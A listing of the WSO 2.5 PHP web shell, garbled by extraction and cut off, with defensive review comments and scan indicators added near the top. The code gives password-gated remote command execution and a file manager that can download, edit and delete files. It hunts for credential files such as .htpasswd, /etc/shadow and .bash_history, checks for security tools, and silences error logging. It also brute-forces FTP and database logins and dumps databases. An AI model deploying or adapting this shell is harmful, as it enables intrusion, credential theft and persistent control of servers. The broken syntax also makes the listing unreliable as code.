?php
/*
 * REVIEW NOTE (defensive annotation)
 * This listing is a PHP web shell that labels itself WSO 2.5 (see the
 * WSO_VERSION define below). The text is damaged by extraction: the "<" of
 * the open tag is missing, many quotes appear as guillemets, and several
 * operators and array entries have been dropped, so it does not parse as PHP
 * in the form shown. The listing is also cut off before the end of the script.
 *
 * Literal strings visible in this part that are useful when scanning a web
 * root or reviewing uploads: 'FilesMan', 'WSO_VERSION', wsoLogin,
 * WSOsetcookie, $auth_pass.
 */
// 32 hex characters; compared below against md5() of the posted 'pass' field.
$auth_pass = «63a9f0ea7bb98050796b649e85481845»;
$color = "#df5";
// Name of the action used by default (dispatch code is not visible in this line).
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
// Requests whose User-Agent matches any listed name get a 404 and the script exits,
// presumably so crawlers and archivers never index the page. Two list entries were
// lost in extraction (the empty slots between commas).
if (!empty ($_SERVER ['HTTP_USER_AGENT'])) {$userAgents = array (, «Slurp», «MSNBot», «ia_archiver», , «Rambler»); if (preg_match ('/'. implode ('|', $userAgents). '/i', $_SERVER ['HTTP_USER_AGENT'])) {header ('HTTP/1.0 404 Not Found'); exit;}}
// Clears the PHP error-log target and disables error logging for this request,
// so activity here will not appear in PHP error logs; web-server access logs and
// file-integrity monitoring are the places to look.
@ini_set ('error_log', NULL);
@ini_set ('log_errors',0);
// Removes the execution time limit for the request.
@ini_set ('max_execution_time',0);
@set_time_limit (0);
// Legacy magic-quotes handling; these functions no longer exist in current PHP
// releases, which indicates the code was written for old PHP versions.
@set_magic_quotes_runtime (0);
@define ('WSO_VERSION', '2.5');
// When magic quotes are on, recursively strips the added slashes from POST and cookie data.
if (get_magic_quotes_gpc ()) {function WSOstripslashes ($array) {return is_array ($array)? array_map ('WSOstripslashes', $array): stripslashes ($array);} $_POST = WSOstripslashes ($_POST); $_COOKIE = WSOstripslashes ($_COOKIE);}
// Ends the request with the password prompt; the form markup appears to have been
// stripped from this listing, leaving only the label text.
function wsoLogin () {die (" Password: ");}
// Sets a cookie and mirrors it into $_COOKIE so it is usable within the same request.
function WSOsetcookie ($k, $v) {$_COOKIE [$k] = $v; setcookie ($k, $v);}
// Access check. The operator between isset (...) and (md5 (...) == $auth_pass) was lost
// in extraction (presumably a logical AND). On a matching password a cookie is set
// whose NAME is md5 of the Host header and whose VALUE is $auth_pass itself; later
// requests are accepted when that cookie equals $auth_pass (loose comparison).
// For log review: a POST field named 'pass', and a cookie with a 32-hex-character name.
if (!empty ($auth_pass)) {if (isset ($_POST ['pass']) (md5 ($_POST ['pass']) == $auth_pass)) WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']), $auth_pass); if (!isset ($_COOKIE [md5 ($_SERVER ['HTTP_HOST'])]) || ($_COOKIE [md5 ($_SERVER ['HTTP_HOST'])]!= $auth_pass)) wsoLogin ();}
// Coarse OS detection from the first three characters of PHP_OS.
if (strtolower (substr (PHP_OS,0,3)) == «win») $os = 'win'; else $os = 'nix';
$safe_mode = @ini_get ('safe_mode');
// Silences all PHP error reporting unless safe_mode is enabled.
if (!$safe_mode) error_reporting (0);
$disable_functions = @ini_get ('disable_functions');
$home_cwd = @getcwd ();
// The working directory is taken directly from the POST field 'c' with no validation.
if (isset ($_POST ['c'])) @chdir ($_POST ['c']);
$cwd = @getcwd ();
// Normalises Windows path separators; the backslash escaping inside the string
// literals was lost in extraction.
if ($os == 'win') {$home_cwd = str_replace ("\", "/", $home_cwd); $cwd = str_replace ("\", "/", $cwd);}
// Ensures $cwd ends with a slash.
if ($cwd [strlen ($cwd)-1]!= '/') $cwd. = '/';
// Defaults the per-host 'ajax' cookie; this statement continues on the next line of the listing.
if (!isset ($_COOKIE [md5 ($_SERVER ['HTTP_HOST']). 'ajax'])) $_COOKIE [md5 ($_SERVER ['HTTP_HOST']). 
'ajax'] = (bool)$default_use_ajax; if ($os == 'win') $aliases = array ("List Directory" => «dir», "Find index.php in current dir" => «dir /s /w /b index.php», "Find config.php in current dir" => «dir /s /w /b config.php», "Show active connections" => «netstat -an», "Show running services" => «net start», "User accounts" => «net user», "Show computers" => «net view», "ARP Table" => «arp -a», "IP Configuration" => «ipconfig /all»); else $aliases = array ("List dir" => «ls -lha», "list file attributes on a Linux second extended file system" => «lsattr -va», "show opened ports" => «netstat -an | grep -i listen», "process status" => «ps aux», "Find" => "", "find all suid files" => «find / -type f -perm -04000 -ls», "find suid files in current dir" => «find. -type f -perm -04000 -ls», "find all sgid files" => «find / -type f -perm -02000 -ls», "find sgid files in current dir" => «find. -type f -perm -02000 -ls», "find config.inc.php files" => «find / -type f -name config.inc.php», "find config* files" => «find / -type f -name \»config\"", "find config files in current dir" => «find. -type f -name \»config\"", "find all writable folders and files" => «find / -perm -2 -ls», "find all writable folders and files in current dir" => «find. -perm -2 -ls», "find all service.pwd files" => «find / -type f -name service.pwd», "find service.pwd files in current dir" => «find. -type f -name service.pwd», "find all.htpasswd files" => «find / -type f -name.htpasswd», "find.htpasswd files in current dir" => «find. -type f -name.htpasswd», "find all.bash_history files" => «find / -type f -name.bash_history», "find.bash_history files in current dir" => «find. -type f -name.bash_history», "find all.fetchmailrc files" => «find / -type f -name.fetchmailrc», "find.fetchmailrc files in current dir" => «find. 
-type f -name.fetchmailrc», "Locate" => "", "locate httpd.conf files" => «locate httpd.conf», "locate vhosts.conf files" => «locate vhosts.conf», "locate proftpd.conf files" => «locate proftpd.conf», "locate psybnc.conf files" => «locate psybnc.conf», "locate my.conf files" => «locate my.conf», "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => «locate cfg.php», "locate conf.php files" => «locate conf.php», "locate config.dat files" => «locate config.dat», "locate config.php files" => «locate config.php», "locate config.inc files" => «locate config.inc», "locate config.inc.php" => «locate config.inc.php», "locate config.default.php files" => «locate config.default.php», "locate config files " => «locate config», "locate.conf files"=>"locate '.conf'", "locate.pwd files" => «locate '.pwd'», "locate.sql files" => «locate '.sql'», "locate.htpasswd files" => «locate '.htpasswd'», "locate.bash_history files" => «locate '.bash_history'», "locate.mysql_history files" => «locate '.mysql_history'», "locate.fetchmailrc files" => «locate '.fetchmailrc'», "locate backup files" => «locate backup», "locate dump files" => «locate dump», "locate priv files" => «locate priv»); function wsoHeader () {if (empty ($_POST ['charset'])) $_POST ['charset'] = $GLOBALS ['default_charset']; global $color; echo "". $_SERVER ['HTTP_HOST']. " — WSO ". WSO_VERSION. 
" body {background-color:#444;color:#e1e1e1;} body, td, th {font: 9pt Lucida, Verdana;margin:0;vertical-align:top;color:#e1e1e1;} table.info {color:#fff;background-color:#222;} span, h1, a {color: $color!important;} span {font-weight: bolder;} h1 {border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;} div.content {padding: 5px;margin-left:5px;background-color:#333;} a {text-decoration:none;} a:hover {text-decoration:underline;}.ml1 {border:1px solid #444;padding:5px;margin:0;overflow: auto;}.bigarea {width:100%;height:300px;} input, textarea, select {margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace, 'Courier New';} form {margin:0px;} toolsTbl {text-align:center;}.toolsInp {width: 300px}.main th {text-align:left;background-color:#5e5e5e;}.main tr:hover {background-color:#5e5e5e}. l1 {background-color:#444}. l2 {background-color:#333} pre {font-family:Courier, Monospace;} var c_ = '". htmlspecialchars ($GLOBALS ['cwd']). "'; var a_ = '". htmlspecialchars (@$_POST ['a']). "' var charset_ = '". htmlspecialchars (@$_POST ['charset']). "'; var p1_ = '". ((strpos (@$_POST ['p1'], "\n")!==false)?'':htmlspecialchars ($_POST ['p1'], ENT_QUOTES)). "'; var p2_ = '". ((strpos (@$_POST ['p2'], "\n")!==false)?'':htmlspecialchars ($_POST ['p2'], ENT_QUOTES)). "'; var p3_ = '". ((strpos (@$_POST ['p3'], "\n")!==false)?'':htmlspecialchars ($_POST ['p3'], ENT_QUOTES)). "'; var d = document; function set (a, c, p1, p2, p3, charset) {if (a!=null) d.mf. a.value=a;else d.mf. a.value=a_; if (c!=null) d.mf. c.value=c;else d.mf. c.value=c_; if (p1!=null) d.mf. p1.value=p1;else d.mf. p1.value=p1_; if (p2!=null) d.mf. p2.value=p2;else d.mf. p2.value=p2_; if (p3!=null) d.mf. p3.value=p3;else d.mf. 
p3.value=p3_; if (charset!=null) d.mf.charset.value=charset;else d.mf.charset.value=charset_;} function g (a, c, p1, p2, p3, charset) {set (a, c, p1, p2, p3, charset); d.mf.submit ();} function a (a, c, p1, p2, p3, charset) {set (a, c, p1, p2, p3, charset); var params = 'ajax=true'; for (i=0;i Read file Make dir:$is_writable Make file:$is_writable Execute Upload file:$is_writable ";} if (!function_exists ("posix_getpwuid") (strpos ($GLOBALS ['disable_functions'], 'posix_getpwuid')===false)) {function posix_getpwuid ($p) {return false;}} if (!function_exists ("posix_getgrgid") (strpos ($GLOBALS ['disable_functions'], 'posix_getgrgid')===false)) {function posix_getgrgid ($p) {return false;}} function wsoEx ($in) {$out = ''; if (function_exists ('exec')) {@exec ($in, $out); $out = @join ("\n", $out);} elseif (function_exists ('passthru')) {ob_start (); @passthru ($in); $out = ob_get_clean ();} elseif (function_exists ('system')) {ob_start (); @system ($in); $out = ob_get_clean ();} elseif (function_exists ('shell_exec')) {$out = shell_exec ($in);} elseif (is_resource ($f = @popen ($in, "r"))) {$out = ""; while (!@feof ($f)) $out. = fread ($f,1024); pclose ($f);} return $out;} function wsoViewSize ($s) {if (is_int ($s)) $s = sprintf ("%u", $s); if ($s = 1073741824) return sprintf ('%1.2f', $s / 1073741824). ' GB'; elseif ($s = 1048576) return sprintf ('%1.2f', $s / 1048576). ' MB'; elseif ($s = 1024) return sprintf ('%1.2f', $s / 1024). ' KB'; else return $s. ' B';} function wsoPerms ($p) {if (($p 0xC000) == 0xC000)$i = 's'; elseif (($p 0xA000) == 0xA000)$i = 'l'; elseif (($p 0x8000) == 0x8000)$i = '-'; elseif (($p 0x6000) == 0x6000)$i = 'b'; elseif (($p 0x4000) == 0x4000)$i = 'd'; elseif (($p 0x2000) == 0x2000)$i = 'c'; elseif (($p 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i. = (($p 0x0100)? 'r': '-'); $i. = (($p 0x0080)? 'w': '-'); $i. = (($p 0x0040)? (($p 0x0800)? 's': 'x'): (($p 0x0800)? 'S': '-')); $i. = (($p 0x0020)? 'r': '-'); $i. = (($p 0x0010)? 
'w': '-'); $i. = (($p 0x0008)? (($p 0x0400)? 's': 'x'): (($p 0x0400)? 'S': '-')); $i. = (($p 0x0004)? 'r': '-'); $i. = (($p 0x0002)? 'w': '-'); $i. = (($p 0x0001)? (($p 0x0200)? 't': 'x'): (($p 0x0200)? 'T': '-')); return $i;} function wsoPermsColor ($f) {if (!@is_readable ($f)) return ''. wsoPerms (@fileperms ($f)). ''; elseif (!@is_writable ($f)) return ''. wsoPerms (@fileperms ($f)). ''; else return ''. wsoPerms (@fileperms ($f)). '';} function wsoScandir ($dir) {if (function_exists ("scandir")) {return scandir ($dir);} else {$dh = opendir ($dir); while (false!== ($filename = readdir ($dh))) $files [] = $filename; return $files;}} function wsoWhich ($p) {$path = wsoEx ('which '. $p); if (!empty ($path)) return $path; return false;} function actionSecInfo () {wsoHeader (); echo ' Server security information '; function wsoSecParam ($n, $v) {$v = trim ($v); if ($v) {echo ''. $n. ': '; if (strpos ($v, "\n") === false) echo $v. ''; else echo ''. $v. '';}} wsoSecParam ('Server software', @getenv ('SERVER_SOFTWARE')); if (function_exists ('apache_get_modules')) wsoSecParam ('Loaded Apache modules', implode (', ', apache_get_modules ())); wsoSecParam ('Disabled PHP Functions', $GLOBALS ['disable_functions']?$GLOBALS ['disable_functions']:'none'); wsoSecParam ('Open base dir', @ini_get ('open_basedir')); wsoSecParam ('Safe mode exec dir', @ini_get ('safe_mode_exec_dir')); wsoSecParam ('Safe mode include dir', @ini_get ('safe_mode_include_dir')); wsoSecParam ('cURL support', function_exists ('curl_version')?'enabled':'no'); $temp=array (); if (function_exists ('mysql_get_client_info')) $temp [] = «MySql (».mysql_get_client_inf if (function_exists ('mssql_connect')) $temp [] = «MSSQL»; if (function_exists ('pg_connect')) $temp [] = «PostgreSQL»; if (function_exists ('oci_connect')) $temp [] = «Oracle»; wsoSecParam ('Supported databases', implode (', ', $temp)); echo ''; if ($GLOBALS ['os'] == 'nix') {wsoSecParam ('Readable /etc/passwd', @is_readable ('/etc/passwd')?"yes 
[view]":'no'); wsoSecParam ('Readable /etc/shadow', @is_readable ('/etc/shadow')?"yes [view]":'no'); wsoSecParam ('OS version', @file_get_contents ('/proc/version')); wsoSecParam ('Distr name', @file_get_contents ('/etc/issue.net')); if (!$GLOBALS ['safe_mode']) {$userful = array ('gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl'); $danger = array ('kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja'); $downloaders = array ('wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror'); echo ''; $temp=array (); foreach ($userful as $item) if (wsoWhich ($item)) $temp [] = $item; wsoSecParam ('Userful', implode (', ', $temp)); $temp=array (); foreach ($danger as $item) if (wsoWhich ($item)) $temp [] = $item; wsoSecParam ('Danger', implode (', ', $temp)); $temp=array (); foreach ($downloaders as $item) if (wsoWhich ($item)) $temp [] = $item; wsoSecParam ('Downloaders', implode (', ', $temp)); echo ''; wsoSecParam ('HDD space', wsoEx ('df -h')); wsoSecParam ('Hosts', @file_get_contents ('/etc/hosts')); echo 'posix_getpwuid ("Read" /etc/passwd) FromTo'; if (isset ($_POST ['p2'], $_POST ['p3']) && is_numeric ($_POST ['p2']) && is_numeric ($_POST ['p3'])) {$temp = ""; for (;$_POST ['p2'] $GLOBALS ['cwd']. $dirContent [$i], 'modify' => date ('Y-m-d H:i:s', @filemtime ($GLOBALS ['cwd']. $dirContent [$i])), 'perms' => wsoPermsColor ($GLOBALS ['cwd']. $dirContent [$i]), 'size' => @filesize ($GLOBALS ['cwd']. $dirContent [$i]), 'owner' => $ow ['name']?$ow ['name']:@fileowner ($dirContent [$i]), 'group' => $gr ['name']?$gr ['name']:@filegroup ($dirContent [$i])); if (@is_file ($GLOBALS ['cwd']. 
$dirContent [$i])) $files [] = array_merge ($tmp, array ('type' => 'file')); elseif (@is_link ($GLOBALS ['cwd']. $dirContent [$i])) $dirs [] = array_merge ($tmp, array ('type' => 'link', 'link' => readlink ($tmp ['path']))); elseif (@is_dir ($GLOBALS ['cwd']. $dirContent [$i])) $dirs [] = array_merge ($tmp, array ('type' => 'dir'));} $GLOBALS ['sort'] = $sort; function wsoCmp ($a, $b) {if ($GLOBALS ['sort'] [0]!= 'size') return strcmp (strtolower ($a [$GLOBALS ['sort'] [0]]), strtolower ($b [$GLOBALS ['sort'] [0]]))* ($GLOBALS ['sort'] [1]?1:-1); else return (($a ['size'] ['. htmlspecialchars ($f ['name']). ']'). ''. (($f ['type']=='file')?wsoViewSize ($f ['size']):$f ['type']). ''. $f ['modify']. ''. $f ['owner']. '/'. $f ['group']. ''. $f ['perms']. 'R T'. (($f ['type']=='file')?' E D':''). ''; $l = $l?0:1;} echo " CopyMoveDelete"; if (class_exists ('ZipArchive')) echo «Compress (zip) Uncompress (zip)»; echo «Compress (tar.gz)»; if (!empty ($_COOKIE ['act']) && @count ($_COOKIE ['f'])) echo «Paste / Compress»; echo " "; if (!empty ($_COOKIE ['act']) && @count ($_COOKIE ['f']) && (($_COOKIE ['act'] == 'zip') || ($_COOKIE ['act'] == 'tar'))) echo «file name: »; echo " "; wsoFooter ();} function actionStringTools () {if (!function_exists ('hex2bin')) {function hex2bin ($p) {return decbin (hexdec ($p));}} if (!function_exists ('binhex')) {function binhex ($p) {return dechex (bindec ($p));}} if (!function_exists ('hex2ascii')) {function hex2ascii ($p) {$r='';for ($i=0;$i strLen ($p);$i+=2) {$r. =chr (hexdec ($p [$i]. $p [$i+1]));} return $r;}} if (!function_exists ('ascii2hex')) {function ascii2hex ($p) {$r='';for ($i=0;$i strlen ($p);++$i)$r. = sprintf ('%02X', ord ($p [$i]));return strtoupper ($r);}} if (!function_exists ('full_urlencode')) {function full_urlencode ($p) {$r='';for ($i=0;$i strlen ($p);++$i)$r. 
= '%'.dechex (ord ($p [$i]));return strtoupper ($r);}} $stringTools = array ('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen',); if (isset ($_POST ['ajax'])) {WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', true); ob_start (); if (in_array ($_POST ['p1'], $stringTools)) echo $_POST'p1'; $temp = «document.getElementById ('strOutput').style.display='';document.getElementById ('strOutput').innerHTML='».addcslashes (htmlspecialchars (ob_get_clean ()), "\n\r\t\'\0"). "';\n"; echo strlen ($temp), "\n", $temp; exit;} if (empty ($_POST ['ajax'])!empty ($_POST ['p1'])) WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', 0); wsoHeader (); echo ' String conversions '; echo ""; foreach ($stringTools as $k => $v) echo "". $k. ""; echo " send using AJAX". (empty ($_POST ['p1'])?'':htmlspecialchars (@$_POST ['p2'])). ""; if (!empty ($_POST ['p1'])) {if (in_array ($_POST ['p1'], $stringTools)) echo htmlspecialchars ($_POST ['p1'] ($_POST ['p2']));} echo" Search files Text Path Name "; function wsoRecursiveGlob ($path) {if (substr ($path, -1)!= '/') $path. ='/'; $paths = @array_unique (@array_merge (@glob ($path. $_POST ['p3']), @glob ($path. 
'*', GLOB_ONLYDIR))); if (is_array ($paths)&&@count ($paths)) {foreach ($paths as $item) {if (@is_dir ($item)) {if ($path!=$item) wsoRecursiveGlob ($item);} else {if (empty ($_POST ['p2']) || @strpos (file_get_contents ($item), $_POST ['p2'])!==false) echo "".htmlspecialchars ($item). "";}}}} if (@$_POST ['p3']) wsoRecursiveGlob ($_POST ['c']); echo " Search for hash "; wsoFooter ();} function actionFilesTools () {if (isset ($_POST ['p1'])) $_POST ['p1'] = urldecode ($_POST ['p1']); if (@$_POST ['p2']=='download') {if (@is_file ($_POST ['p1']) @is_readable ($_POST ['p1'])) {ob_start ("ob_gzhandler", 4096); header ("Content-Disposition: attachment; filename=".basename ($_POST ['p1'])); if (function_exists ("mime_content_type")) {$type = @mime_content_type ($_POST ['p1']); header ("Content-Type: ". $type);} else header ("Content-Type: application/octet-stream"); $fp = @fopen ($_POST ['p1'], «r»); if ($fp) {while (!@feof ($fp)) echo @fread ($fp, 1024); fclose ($fp);}} exit;} if (@$_POST ['p2'] == 'mkfile') {if (!file_exists ($_POST ['p1'])) {$fp = @fopen ($_POST ['p1'], 'w'); if ($fp) {$_POST ['p2'] = «edit»; fclose ($fp);}}} wsoHeader (); echo ' File tools '; if (!file_exists (@$_POST ['p1'])) {echo 'File not exists'; wsoFooter (); return;} $uid = @posix_getpwuid (@fileowner ($_POST ['p1'])); if (!$uid) {$uid ['name'] = @fileowner ($_POST ['p1']); $gid ['name'] = @filegroup ($_POST ['p1']);} else $gid = @posix_getgrgid (@filegroup ($_POST ['p1'])); echo 'Name: '.htmlspecialchars (@basename ($_POST ['p1'])). ' Size: '. (is_file ($_POST ['p1'])?wsoViewSize (filesize ($_POST ['p1'])):'-'). ' Permission: '.wsoPermsColor ($_POST ['p1']). ' Owner/Group: '. $uid ['name']. '/'. $gid ['name']. ''; echo 'Change time: '.date ('Y-m-d H:i:s', filectime ($_POST ['p1'])). ' Access time: '.date ('Y-m-d H:i:s', fileatime ($_POST ['p1'])). ' Modify time: '.date ('Y-m-d H:i:s', filemtime ($_POST ['p1'])). 
''; if (empty ($_POST ['p2'])) $_POST ['p2'] = 'view'; if (is_file ($_POST ['p1'])) $m = array ('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array ('Chmod', 'Rename', 'Touch'); foreach ($m as $v) echo ''. ((strtolower ($v)==@$_POST ['p2'])?' ['. $v. ']':$v). ' '; echo ''; switch ($_POST ['p2']) {case 'view' echo ''; $fp = @fopen ($_POST ['p1'], 'r'); if ($fp) {while (!@feof ($fp)) echo htmlspecialchars (@fread ($fp, 1024)); @fclose ($fp);} echo ''; break; case 'highlight' if (@is_readable ($_POST ['p1'])) {echo ''; $code = @highlight_file ($_POST ['p1'], true); echo str_replace (array (''; break; case 'hexdump' $c = @file_get_contents ($_POST ['p1']); $n = 0; $h = array ('00000000', '', ''); $len = strlen ($c); for ($i=0; $i'; break; case 'touch' if (!empty ($_POST ['p3'])) {$time = strtotime ($_POST ['p3']); if ($time) {if (!touch ($_POST ['p1'], $time, $time)) echo 'Fail!'; else echo 'Touched!';} else echo 'Bad time format!';} clearstatcache (); echo 'p3_="";'; break;} echo ' '; wsoFooter ();} function actionConsole () {if (!empty ($_POST ['p1'])!empty ($_POST ['p2'])) {WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'stderr_to_out', true); $_POST ['p1']. = ' 2> 1';} elseif (!empty ($_POST ['p1'])) WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'stderr_to_out', 0); if (isset ($_POST ['ajax'])) {WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 'ajax', true); ob_start (); echo d.cf.cmd.value='';\n; $temp = @iconv ($_POST ['charset'], 'UTF-8', addcslashes (\n$. $_POST ['p1']. \n.wsoEx ($_POST ['p1']), \n\r\t\\'\0)); if (preg_match (!. *cd\s+ ([^;]+)$!, $_POST ['p1'], $match)) {if (@chdir ($match [1])) {$GLOBALS ['cwd'] = @getcwd (); echo c_='. $GLOBALS ['cwd']. ';;}} echo d.cf.output.value+='. $temp. ';; echo d.cf.output.scrollTop = d.cf.output.scrollHeight;; $temp = ob_get_clean (); echo strlen ($temp), \n, $temp; exit;} if (empty ($_POST ['ajax'])!empty ($_POST ['p1'])) WSOsetcookie (md5 ($_SERVER ['HTTP_HOST']). 
'ajax', 0); wsoHeader (); echo script if (window.Event) window.captureEvents (Event.KEYDOWN); var cmds = new Array (''); var cur = 0; function kp (e) {var n = (window.Event)? e.which: e.keyCode; if (n == 38) {cur—; if (cur>=0) document.cf.cmd.value = cmds [cur]; else cur++;} else if (n == 40) {cur++; if (cur cmds.length) document.cf.cmd.value = cmds [cur]; else cur—;}} function add (cmd) {cmds.pop (); cmds.push (cmd); cmds.push (''); cur = cmds.length-1;} "; echo ' Console '; foreach ($GLOBALS ['aliases'] as $n => $v) {if ($v == '') {echo ''; continue;} echo ''. $n. '';} echo ' send using AJAX redirect stderr to stdout (2>&1)'; if (!empty ($_POST ['p1'])) {echo htcialchars ("$ ". $_POST ['p1']. "\n".wsoEx ($_POST ['p1']));} echo '$'; echo ' d.cf.cmd.focus ();'; wsoFooter ();} function actionLogout () {setcookie (md5 ($_SERVER ['HTTP_HOST']), '', time () — 3600); die ('bye!');} function actionSelfRemove () {if ($_POST ['p1'] == 'yes') if (@unlink (preg_replace ('!\ (\d+\)\s. *!', '', __FILE__))) die ('Shell has been removed'); else echo 'unlink error!'; if ($_POST ['p1']!= 'yes') wsoHeader (); echo ' h1 Suicide /h1 div class=content Really want to remove the shell? br a href=# onclick= g (null, null, \'yes\') Yes /a /div '; wsoFooter ();} function actionBruteforce () {wsoHeader (); if (isset ($_POST ['proto'])) {echo ' Results Type: '.htmlspecialchars ($_POST ['proto']). ' Server: '.htmlspecialchars ($_POST ['server']). ''; if ($_POST ['proto'] == 'ftp') {function wsoBruteForce ($ip, $port, $login, $pass) {$fp = @ftp_connect ($ip, $port?$port:21); if (!$fp) return false; $res = @ftp_login ($fp, $login, $pass); @ftp_close ($fp); return $res;}} elseif ($_POST ['proto'] == 'mysql') {function wsoBruteForce ($ip, $port, $login, $pass) {$res = @mysql_connect ($ip. ':'. ($port?$port:3306), $login, $pass); @mysql_close ($res); return $res;}} elseif ($_POST ['proto'] == 'pgsql') {function wsoBruteForce ($ip, $port, $login, $pass) {$str = «host='». $ip. "' port='". $port. 
"' user='". $login. "' password='". $pass. "' dbname=postgres"; $res = @pg_connect ($str); @pg_close ($res); return $res;}} $success = 0; $attempts = 0; $server = explode (":", $_POST ['server']); if ($_POST ['type'] == 1) {$temp = @file ('/etc/passwd'); if (is_array ($temp)) foreach ($temp as $line) {$line = explode (":", $line); ++$attempts; if (wsoBruteForce (@$server [0], @$server [1], $line [0], $line [0])) {$success++; echo ''.htmlspecialchars ($line [0]). ':'.htmlspecialchars ($line [0]). '';} if (@$_POST ['reverse']) {$tmp = ""; for ($i=strlen ($line [0])-1; $i>=0; —$i) $tmp. = $line [0] [$i]; ++$attempts; if (wsoBruteForce (@$server [0], @$server [1], $line [0], $tmp)) {$success++; echo ''.htmlspecialchars ($line [0]). ':'.htmlspecialchars ($tmp);}}}} elseif ($_POST ['type'] == 2) {$temp = @file ($_POST ['dict']); if (is_array ($temp)) foreach ($temp as $line) {$line = trim ($line); ++$attempts; if (wsoBruteForce ($server [0], @$server [1], $_POST ['login'], $line)) {$success++; echo ''.htmlspecialchars ($_POST ['login']). ':'.htmlspecialchars ($line). '';}}} echo «Attempts: $attempts Success: $success »;} echo ' Bruteforce Type'. 'FTPMySqlPostgreSql'. ''. ''. ''. 'Server:port'. ''. 'Brute type'. ' /etc/passwd'. ' reverse (login -> nigol)'. ' Dictionary'. 'Login'. ''. 'Dictionary'. ''. 
''; echo ' '; wsoFooter ();} function actionSql () {class DbClass {var $type; var $link; var $res; function DbClass ($type) {$this->type = $type;} function connect ($host, $user, $pass, $dbname) {switch ($this->type) {case 'mysql' if ($this->link = @mysql_connect ($host, $user, $pass, true)) return true; break; case 'pgsql' $host = explode (':', $host); if (!$host [1]) $host [1]=5432; if ($this->link = @pg_connect ("host= {$host [0]} port= {$host [1]} user=$user password=$pass dbname=$dbname")) return true; break;} return false;} function selectdb ($db) {switch ($this->type) {case 'mysql' if (@mysql_select_db ($db)) return true; break;} return false;} function query ($str) {switch ($this->type) {case 'mysql' return $this->res = @mysql_query ($str); break; case 'pgsql' return $this->res = @pg_query ($this->link, $str); break;} return false;} function fetch () {$res = func_num_args ()?func_get_arg (0):$this->res; switch ($this->type) {case 'mysql' return @mysql_fetch_assoc ($res); break; case 'pgsql' return @pg_fetch_assoc ($res); break;} return false;} function listDbs () {switch ($this->type) {case 'mysql' return $this->query ("SHOW databases"); break; case 'pgsql' return $this->res = $this->query ("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break;} return false;} function listTables () {switch ($this->type) {case 'mysql' return $this->res = $this->query ('SHOW TABLES'); break; case 'pgsql' return $this->res = $this->query ("select table_name from information_schema.tables where table_schema!= 'information_schema' AND table_schema!= 'pg_catalog'"); break;} return false;} function error () {switch ($this->type) {case 'mysql' return @mysql_error (); break; case 'pgsql' return @pg_last_error (); break;} return false;} function setCharset ($str) {switch ($this->type) {case 'mysql' if (function_exists ('mysql_set_charset')) return @mysql_set_charset ($str, $this->link); else $this->query ('SET CHARSET '. 
$str); break; case 'pgsql' return @pg_set_client_encoding ($this->link, $str); break;} return false;} function loadFile ($str) {switch ($this->type) {case 'mysql' return $this->fetch ($this->query ("SELECT LOAD_FILE ('".addslashes ($str). "') as file")); break; case 'pgsql' $this->query ("CREATE TABLE wso2 (file text);COPY wso2 FROM '".addslashes ($str). "';select file from wso2;"); $r=array (); while ($i=$this->fetch ()) $r [] = $i ['file']; $this->query ('drop table wso2'); return array ('file'=>implode ("\n", $r)); break;} return false;} function dump ($table, $fp = false) {switch ($this->type) {case 'mysql' $res = $this->query ('SHOW CREATE TABLE '. $table. ''); $create = mysql_fetch_array ($res); $sql = $create [1]. ";\n"; if ($fp) fwrite ($fp, $sql); else echo ($sql); $this->query ('SELECT * FROM '. $table. ''); $i = 0; $head = true; while ($item = $this->fetch ()) {$sql = ''; if ($i % 1000 == 0) {$head = true; $sql = ";\n\n";} $columns = array (); foreach ($item as $k= $v) {if ($v === null) $item [$k] = NULL; elseif (is_int ($v)) $item [$k] = $v; else $item [$k] = '. @mysql_real_escape_string ($v). '; $columns [] = `. $k. `;} if ($head) {$sql. = 'INSERT INTO `'. $table. '` ('.implode (, , $columns).) VALUES \n\t (.implode (, , $item). ')'; $head = false;} else $sql. = \n\t, (.implode (, , $item). ')'; if ($fp) fwrite ($fp, $sql); else echo ($sql); $i++;} if (!$head) if ($fp) fwrite ($fp,;\n\n); else echo (;\n\n); break; case 'pgsql' $this— query ('SELECT * FROM '. $table); while ($item = $this— fetch ()) {$columns = array (); foreach ($item as $k= $v) {$item [$k] = '.addslashes ($v). '; $columns [] = $k;} $sql = 'INSERT INTO '. $table. ' ('.implode (, , $columns). ') VALUES ('.implode (, , $item). ');'. 
